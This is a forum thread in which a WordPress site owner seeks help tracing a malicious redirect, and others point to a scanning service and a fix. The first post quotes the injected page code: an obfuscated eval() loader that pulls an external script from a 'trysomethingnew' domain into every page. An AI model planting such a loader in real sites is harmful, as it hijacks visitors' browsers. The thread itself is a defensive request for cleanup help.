Redirect found on Wordpress site

esteeven · 08-30-2017, 09:30 AM

I am trying to find and understand how a page redirect is happening on a Wordpress site. I have taken the site down and am working my way through it, trying to work out where the exploit is.

The redirect seems to go under the name of ẗrysomethingnew"and I have found reference to this in the page source file looked at through Firefox.

Code:

/style><script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 1=2.6(\'1\');1.5=\'4://3.8.9/d.3\';2.a(\'b\')[0].c(1);',14,14,'|script|document|js|https|src|createElement|var|trysomethingnew|eu|getElementsByTagName|head|appendChild|analytics'.split('|'),0,{}))</script><script type="text/javascript">(function() {function addEventListener(element,event,handler) { 	if(element.addEventListener) { 		element.addEventListener(event,handler, false); 	} else if(element.attachEvent){ 		element.attachEvent('on'+event,handler); 	} }function maybePrefixUrlField() { 	if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) { 		this.value = "http://" + this.value; 	} }  var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]'); if( urlFields && urlFields.length > 0 ) { 	for( var j=0; j < urlFields.length; j++ ) { 		addEventListener(urlFields[j],'blur',maybePrefixUrlField); 	} }/* test if browser supports date fields */ var testInput = document.createElement('input'); testInput.setAttribute('type', 'date'); if( testInput.type !== 'date') {  	/* add placeholder & pattern to all date fields */ 	var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]'); 	for(var i=0; i<dateFields.length; i++) { 		if(!dateFields[i].placeholder) { 			dateFields[i].placeholder = 'YYYY-MM-DD'; 		} 		if(!dateFields[i].pattern) { 			dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])'; 		} 	} }  })();</script>

Iḿ not sure if this is the offending script but it does contain the words ẗrysomethingnew." I have copied everthing between the <script> tags.

Where do I start when trying to find this? I can make head nor tail of it. Is there anything there to help identify where the script is?

The site is running on a clean install of Wordpress (fully updated) and the redirect is not happening now but the script is still there.

Any ideas?
Cheers.

Habitual · 08-30-2017, 09:47 AM

Quote:

Originally Posted by esteeven

Is there anything there to help identify where the script is?

https://aw-snap.info/

What does "clean install" mean?
0 or few posts?

Import any wp_posts?

esteeven · 08-30-2017, 09:56 AM

Quote:

Originally Posted by Habitual

https://aw-snap.info/

What does "clean install" mean?
0 or few posts?

Import any wp_posts?

Hello Habitual

The Wordpress install is fresh. There are many posts.

Great site link

edit
I have found the code. Thanks for the link Habitual. For future reference, the answer (I hope) is here:
https://productforums.google.com/for...rs/u5mYsV6gVdg

Thanks

Habitual · 08-30-2017, 11:11 AM

redleg's answer tells us plenty, except how it got "there".

Any ideas?
Newspaper theme.version current status is....?

Quote:

Originally Posted by esteeven

I have found the code. Thanks for the link Habitual. For future reference, the answer (I hope) is here:
https://productforums.google.com/for...rs/u5mYsV6gVdg

Good Job.+1